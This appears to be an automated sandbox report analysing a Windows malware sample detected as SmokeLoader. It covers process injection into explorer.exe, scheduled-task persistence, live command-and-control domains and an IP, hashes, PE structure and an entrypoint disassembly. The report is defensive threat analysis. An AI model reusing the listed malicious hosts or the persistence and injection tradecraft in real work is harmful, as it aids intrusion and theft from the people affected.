Source: C:\Users\user\Desktop\file.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vhefigi	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vhefigi	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\file.exe	Thread created: C:\Windows\explorer.exe EIP: 4501930			Jump to behavior
Source: C:\Users\user\AppData\Roaming\vhefigi	Thread created: unknown EIP: 4581930			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe			Jump to behavior
Source: C:\Users\user\AppData\Roaming\vhefigi	Process created: C:\Users\user\AppData\Roaming\vhefigi C:\Users\user\AppData\Roaming\vhefigi			Jump to behavior

Source: explorer.exe, 00000002.00000000.281790475.0000000000B10000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000002.00000000.281790475.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.286308744.00000000056F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.305414665.0000000007B83000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.281790475.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.281543571.00000000004C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000002.00000000.281790475.0000000000B10000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\file.exe	Code function: GetComboBoxInfo,SetLastError,EnumTimeFormatsA,FindNextFileW,EnumCalendarInfoW,VerifyVersionInfoA,EnumTimeFormatsA,InterlockedDecrement,GetLongPathNameW,WaitForSingleObject,QueryMemoryResourceNotification,GetUserDefaultLangID,WritePrivateProfileStringA,AddRefActCtx,MoveFileWithProgressA,DeleteVolumeMountPointA,DeleteVolumeMountPointA,CreateActCtxA,EnumTimeFormatsA,_hwrite,SetHandleInformation,EnumResourceLanguagesA,CreateNamedPipeA,GetCurrentProcessId,GetComputerNameA,GetLocaleInfoW,HeapAlloc,GetModuleHandleW,SetVolumeMountPointW,FindResourceW,DeleteVolumeMountPointA,GetConsoleAliasesLengthA,LoadLibraryA,LoadLibraryA,GlobalFlags,WritePrivateProfileSectionA,GetConsoleAliasW,SetConsoleCursorInfo,GetProfileSectionA,LoadLibraryA,GetLastError,EndUpdateResourceA,GetModuleHandleW,FreeConsole,FindResourceW,SearchPathA,GetConsoleTitleA,OpenMutexW,GetUserDefaultLangID,InterlockedExchange,GetBinaryTypeW,GetCommandLineW,	0_2_00404BB9
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,DebugActiveProcessStop,WriteConsoleOutputAttribute,FreeUserPhysicalPages,GetProcessId,ReadConsoleInputA,WaitForMultipleObjects,LocalSize,CreateDirectoryExA,FindFirstVolumeMountPointW,WriteFile,ClearCommBreak,WriteConsoleInputA,FindActCtxSectionStringA,CreateFileA,	0_2_004045DF
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoA,	0_2_00415238

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00404BB9 GetComboBoxInfo,SetLastError,EnumTimeFormatsA,FindNextFileW,EnumCalendarInfoW,VerifyVersionInfoA,EnumTimeFormatsA,InterlockedDecrement,GetLongPathNameW,WaitForSingleObject,QueryMemoryResourceNotification,GetUserDefaultLangID,WritePrivateProfileStringA,AddRefActCtx,MoveFileWithProgressA,DeleteVolumeMountPointA,DeleteVolumeMountPointA,CreateActCtxA,EnumTimeFormatsA,_hwrite,SetHandleInformation,EnumResourceLanguagesA,CreateNamedPipeA,GetCurrentProcessId,GetComputerNameA,GetLocaleInfoW,HeapAlloc,GetModuleHandleW,SetVolumeMountPointW,FindResourceW,DeleteVolumeMountPointA,GetConsoleAliasesLengthA,LoadLibraryA,LoadLibraryA,GlobalFlags,WritePrivateProfileSectionA,GetConsoleAliasW,SetConsoleCursorInfo,GetProfileSectionA,LoadLibraryA,GetLastError,EndUpdateResourceA,GetModuleHandleW,FreeConsole,FindResourceW,SearchPathA,GetConsoleTitleA,OpenMutexW,GetUserDefaultLangID,InterlockedExchange,GetBinaryTypeW,GetCommandLineW,

0_2_00404BB9

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0040D77B GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_0040D77B

Stealing of Sensitive Information

Yara detected SmokeLoader

Source: Yara match	File source: 0.2.file.exe.5815a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.vhefigi.7d15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.vhefigi.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.318591413.0000000002051000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.318398880.0000000000580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.398871259.0000000002070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.398929809.0000000002091000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected SmokeLoader

Source: Yara match	File source: 0.2.file.exe.5815a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.vhefigi.7d15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.vhefigi.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.318591413.0000000002051000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.318398880.0000000000580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.398871259.0000000002070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.398929809.0000000002091000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	3 Native API	1 DLL Side-Loading	313 Process Injection	11 Masquerading	1 Input Capture	1 System Time Discovery	Remote Services	1 Input Capture	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	1 Exploitation for Client Execution	Boot or Logon Initialization Scripts	1 DLL Side-Loading	12 Virtualization/Sandbox Evasion	LSASS Memory	321 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Bluetooth	2 Non-Application Layer Protocol	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	313 Process Injection	Security Account Manager	12 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	112 Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Deobfuscate/Decode Files or Information	NTDS	3 Process Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Hidden Files and Directories	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	2 Obfuscated Files or Information	Cached Domain Credentials	1 Remote System Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Software Packing	DCSync	1 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	13 System Information Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	1 File Deletion	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
file.exe	46%	ReversingLabs	Win32.Ransomware.Stop
file.exe	36%	Virustotal		Browse
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\vhefigi	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\vhefigi	46%	ReversingLabs	Win32.Ransomware.Stop
C:\Users\user\AppData\Roaming\vhefigi	36%	Virustotal		Browse

Unpacked PE Files

Source	Detection	Scanner	Label	Download
12.2.vhefigi.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.2.file.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.2.file.exe.5815a0.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
11.2.vhefigi.7d15a0.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

Source	Detection	Scanner	Label	Link
host-file-host6.com	18%	Virustotal		Browse
host-host-file8.com	18%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://host-file-host6.com/	0%	URL Reputation	safe
http://host-host-file8.com/	100%	URL Reputation	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
host-file-host6.com	185.246.221.63	true	true	18%, Virustotal, Browse	unknown
host-host-file8.com	unknown	unknown	true	18%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://host-file-host6.com/	true	URL Reputation: safe	unknown
http://host-host-file8.com/	true	URL Reputation: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.246.221.63	host-file-host6.com	Germany		10753	LVLT-10753US	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	800803
Start date and time:	2023-02-07 20:03:12 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 31s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	file.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@6/2@4/2
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 99.8% (good quality ratio 91.6%) Quality average: 71.9% Quality standard deviation: 31.9%
HCA Information:	Successful, ratio: 98% Number of executed functions: 18 Number of non-executed functions: 21
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, login.live.com, ctldl.windowsupdate.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
20:05:07	API Interceptor	475x Sleep call for process: explorer.exe modified
20:05:41	Task Scheduler	Run new task: Firefox Default Browser Agent E85BC7988C711DBE path: C:\Users\user\AppData\Roaming\vhefigi

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
185.246.221.63	file.exe	Get hash	malicious	Browse	host-file-host6.com/
	file.exe	Get hash	malicious	Browse	host-file-host6.com/
	file.exe	Get hash	malicious	Browse	host-file-host6.com/
	file.exe	Get hash	malicious	Browse	host-file-host6.com/
	file.exe	Get hash	malicious	Browse	host-file-host6.com/
	file.exe	Get hash	malicious	Browse	host-file-host6.com/
	file.exe	Get hash	malicious	Browse	host-file-host6.com/
	file.exe	Get hash	malicious	Browse	host-file-host6.com/
	file.exe	Get hash	malicious	Browse	host-file-host6.com/
	file.exe	Get hash	malicious	Browse	host-file-host6.com/
	file.exe	Get hash	malicious	Browse	host-file-host6.com/
	file.exe	Get hash	malicious	Browse	host-file-host6.com/
	file.exe	Get hash	malicious	Browse	host-file-host6.com/
	file.exe	Get hash	malicious	Browse	host-file-host6.com/
	file.exe	Get hash	malicious	Browse	host-file-host6.com/
	file.exe	Get hash	malicious	Browse	host-file-host6.com/
	file.exe	Get hash	malicious	Browse	host-file-host6.com/
	file.exe	Get hash	malicious	Browse	host-file-host6.com/
	file.exe	Get hash	malicious	Browse	host-file-host6.com/
	file.exe	Get hash	malicious	Browse	host-file-host6.com/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
host-file-host6.com	file.exe	Get hash	malicious	Browse	185.246.221.63
	file.exe	Get hash	malicious	Browse	185.246.221.63
	file.exe	Get hash	malicious	Browse	185.246.221.63
	file.exe	Get hash	malicious	Browse	185.246.221.63
	file.exe	Get hash	malicious	Browse	185.246.221.63
	file.exe	Get hash	malicious	Browse	185.246.221.63
	file.exe	Get hash	malicious	Browse	185.246.221.63
	file.exe	Get hash	malicious	Browse	185.246.221.63
	file.exe	Get hash	malicious	Browse	185.246.221.63
	file.exe	Get hash	malicious	Browse	185.246.221.63
	file.exe	Get hash	malicious	Browse	185.246.221.63
	file.exe	Get hash	malicious	Browse	185.246.221.63
	file.exe	Get hash	malicious	Browse	185.246.221.63
	file.exe	Get hash	malicious	Browse	185.246.221.63
	file.exe	Get hash	malicious	Browse	185.246.221.63
	file.exe	Get hash	malicious	Browse	185.246.221.63
	file.exe	Get hash	malicious	Browse	185.246.221.63
	file.exe	Get hash	malicious	Browse	185.246.221.63
	file.exe	Get hash	malicious	Browse	185.246.221.63
	file.exe	Get hash	malicious	Browse	185.246.221.63

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
LVLT-10753US	Compiled.xlsx	Get hash	malicious	Browse	185.246.220.33
	https://4nu46.app.link/3ljjXIsWaxb	Get hash	malicious	Browse	185.246.221.60
	EDD.exe	Get hash	malicious	Browse	194.180.49.19
	25b1FT9ZdT.exe	Get hash	malicious	Browse	45.81.39.147
	v9Lyz1CSRI.exe	Get hash	malicious	Browse	45.81.39.147
	IN-001.doc	Get hash	malicious	Browse	185.246.220.85
	https://1drv.ms/w/s!Ar9DfDwqlsxsgQM6UjAimXPT7Iog	Get hash	malicious	Browse	185.246.221.60
	https://j43eb.app.link/FYAHdLYWaxb	Get hash	malicious	Browse	185.246.221.60
	https://bit.ly/3DGpBI1	Get hash	malicious	Browse	185.246.221.60
	file.exe	Get hash	malicious	Browse	185.246.221.63
	file.exe	Get hash	malicious	Browse	185.246.221.63
	file.exe	Get hash	malicious	Browse	185.246.221.63
	file.exe	Get hash	malicious	Browse	185.246.221.63
	file.exe	Get hash	malicious	Browse	185.246.221.63
	file.exe	Get hash	malicious	Browse	185.246.221.63
	file.exe	Get hash	malicious	Browse	185.246.221.63
	file.exe	Get hash	malicious	Browse	185.246.221.63
	file.exe	Get hash	malicious	Browse	185.246.221.63
	file.exe	Get hash	malicious	Browse	185.246.221.63
	file.exe	Get hash	malicious	Browse	185.246.221.63

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Roaming\vhefigi

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	198144
Entropy (8bit):	7.034848311694385
Encrypted:	false
SSDEEP:	3072:BJoObqrFdq4LsfErWQ5vk/HqHA0KK1HYRkqPSM3Fa59NhVwgy:BJoDa4LXrxk/cA0/FYeSLFU9Ncg
MD5:	04A988E37B8EA5FACD28A7D42764F597
SHA1:	1182F9D0DE33E9363C7777F3F76D26C179A856E6
SHA-256:	7B734ABB20157CA48892547A61F80013138E9659B0942895991A9AB49FDADF79
SHA-512:	24519302727DCDBB5B020FEB1729980E0602409A205534B4577461E321C95A54A872026809C50C75D04B3B6C112D4E761381E11197F4AC11F106F0165779F252
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 46% Antivirus: Virustotal, Detection: 36%, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................B.s.....p.....f..............w...a.....q.....t....Rich...........PE..L...8}.a.....................<......or............@.........................................................................l...P...................................@...............................p9..@............................................text............................... ..`.data............6..................@....rsrc............ ..................@..@.reloc..n'.......(..................@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\vhefigi:Zone.Identifier

Download File

Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.034848311694385
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	198144
MD5:	04a988e37b8ea5facd28a7d42764f597
SHA1:	1182f9d0de33e9363c7777f3f76d26c179a856e6
SHA256:	7b734abb20157ca48892547a61f80013138e9659b0942895991a9ab49fdadf79
SHA512:	24519302727dcdbb5b020feb1729980e0602409a205534b4577461e321c95a54a872026809c50c75d04b3b6c112d4e761381e11197f4ac11f106f0165779f252
SSDEEP:	3072:BJoObqrFdq4LsfErWQ5vk/HqHA0KK1HYRkqPSM3Fa59NhVwgy:BJoDa4LXrxk/cA0/FYeSLFU9Ncg
TLSH:	DF14C0223980F372C06B25705874DBA53FFEB5309175895B7BA917AE4F302D2663A387
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................B.s.......p.......f.................w.....a.......q.......t.....Rich............PE..L...8}.a...................

File Icon


Icon Hash:	70d0eeeacacaeadd

Static PE Info

General

Entrypoint:	0x40726f
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x611A7D38 [Mon Aug 16 14:59:04 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	87e1f4e32d01d5a52e605f27fd138118

Entrypoint Preview

Instruction
call 00007F1340BE4E4Ch
jmp 00007F1340BDE7BEh
int3
int3
int3
int3
int3
int3
int3
mov ecx, dword ptr [esp+04h]
test ecx, 00000003h
je 00007F1340BDE966h
mov al, byte ptr [ecx]
add ecx, 01h
test al, al
je 00007F1340BDE990h
test ecx, 00000003h
jne 00007F1340BDE931h
add eax, 00000000h
lea esp, dword ptr [esp+00000000h]
lea esp, dword ptr [esp+00000000h]
mov eax, dword ptr [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, FFFFFFFFh
xor eax, edx
add ecx, 04h
test eax, 81010100h
je 00007F1340BDE92Ah
mov eax, dword ptr [ecx-04h]
test al, al
je 00007F1340BDE974h
test ah, ah
je 00007F1340BDE966h
test eax, 00FF0000h
je 00007F1340BDE955h
test eax, FF000000h
je 00007F1340BDE944h
jmp 00007F1340BDE90Fh
lea eax, dword ptr [ecx-01h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
lea eax, dword ptr [ecx-02h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
lea eax, dword ptr [ecx-03h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
lea eax, dword ptr [ecx-04h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
cmp ecx, dword ptr [0042C190h]
jne 00007F1340BDE944h
rep ret
jmp 00007F1340BE4E3Ch
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [0042C190h]

Rich Headers

Programming Language:

[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[C++] VS2008 build 21022
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1876c	0x50	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x15a000	0x1ee8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x15c000	0xf1c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1240	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x3970	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x1f4	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1831a	0x18400	False	0.5321560889175257	data	6.371835638411856	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x1a000	0x13f290	0x13600	False	0.9425277217741935	data	7.833380745851634	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x15a000	0x1ee8	0x2000	False	0.60888671875	data	5.786997654811944	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x15c000	0x276e	0x2800	False	0.32099609375	data	3.3385866771832506	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x15a1c0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Tibetan	Tibet
RT_ICON	0x15a1c0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Tibetan	Nepal
RT_ICON	0x15a1c0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Tibetan	India
RT_ICON	0x15aa68	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Tibetan	Tibet
RT_ICON	0x15aa68	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Tibetan	Nepal
RT_ICON	0x15aa68	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Tibetan	India
RT_STRING	0x15bd90	0x4e	data	Tibetan	Tibet
RT_STRING	0x15bd90	0x4e	data	Tibetan	Nepal
RT_STRING	0x15bd90	0x4e	data	Tibetan	India
RT_STRING	0x15bde0	0x50	data	Tibetan	Tibet
RT_STRING	0x15bde0	0x50	data	Tibetan	Nepal
RT_STRING	0x15bde0	0x50	data	Tibetan	India
RT_STRING	0x15be30	0xb6	data	Tibetan	Tibet
RT_STRING	0x15be30	0xb6	data	Tibetan	Nepal
RT_STRING	0x15be30	0xb6	data	Tibetan	India
RT_GROUP_ICON	0x15bb10	0x22	data	Tibetan	Tibet
RT_GROUP_ICON	0x15bb10	0x22	data	Tibetan	Nepal
RT_GROUP_ICON	0x15bb10	0x22	data	Tibetan	India
RT_VERSION	0x15bb38	0x258	data

Imports

DLL	Import
KERNEL32.dll	RequestWakeupLatency, CreateFileA, FindActCtxSectionStringA, WriteConsoleInputA, ClearCommBreak, WriteFile, FindFirstVolumeMountPointW, CreateDirectoryExA, LocalSize, WaitForMultipleObjects, ReadConsoleInputA, GetProcessId, FreeUserPhysicalPages, WriteConsoleOutputAttribute, DebugActiveProcessStop, GetLocaleInfoW, GetProcAddress, LocalAlloc, GetCommandLineW, GetBinaryTypeW, InterlockedExchange, OpenMutexW, GetConsoleTitleA, SearchPathA, FreeConsole, EndUpdateResourceA, GetLastError, GetProfileSectionA, SetConsoleCursorInfo, GetConsoleAliasW, CreateSemaphoreA, GlobalFlags, GetConsoleAliasesLengthA, FindResourceW, SetVolumeMountPointW, GetModuleHandleW, HeapAlloc, GetComputerNameA, GetCurrentProcessId, CreateNamedPipeA, EnumResourceLanguagesA, SetHandleInformation, _hwrite, CreateActCtxA, DeleteVolumeMountPointA, MoveFileWithProgressA, AddRefActCtx, WritePrivateProfileStringA, GetUserDefaultLangID, QueryMemoryResourceNotification, WaitForSingleObject, GetLongPathNameW, InterlockedDecrement, VerifyVersionInfoA, EnumCalendarInfoW, FindNextFileW, EnumTimeFormatsA, SetLastError, SetCriticalSectionSpinCount, WritePrivateProfileSectionA, LoadLibraryA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, RaiseException, RtlUnwind, HeapFree, DeleteFileA, GetStartupInfoW, GetModuleHandleA, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, GetCurrentThreadId, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualAlloc, HeapReAlloc, Sleep, ExitProcess, GetStdHandle, GetModuleFileNameA, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, GetFileType, GetStartupInfoA, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapSize, InitializeCriticalSectionAndSpinCount, WideCharToMultiByte, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, CloseHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetStdHandle
USER32.dll	GetComboBoxInfo
GDI32.dll	GetTextFaceW

Possible Origin

Language of compilation system	Country where language is spoken	Map
Tibetan	Tibet
Tibetan	Nepal
Tibetan	India

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 7, 2023 20:05:06.676763058 CET	49722	80	192.168.2.7	185.246.221.63
Feb 7, 2023 20:05:06.704660892 CET	80	49722	185.246.221.63	192.168.2.7
Feb 7, 2023 20:05:06.704898119 CET	49722	80	192.168.2.7	185.246.221.63
Feb 7, 2023 20:05:06.705308914 CET	49722	80	192.168.2.7	185.246.221.63
Feb 7, 2023 20:05:06.705343962 CET	49722	80	192.168.2.7	185.246.221.63
Feb 7, 2023 20:05:06.741307020 CET	80	49722	185.246.221.63	192.168.2.7
Feb 7, 2023 20:05:06.850627899 CET	80	49722	185.246.221.63	192.168.2.7
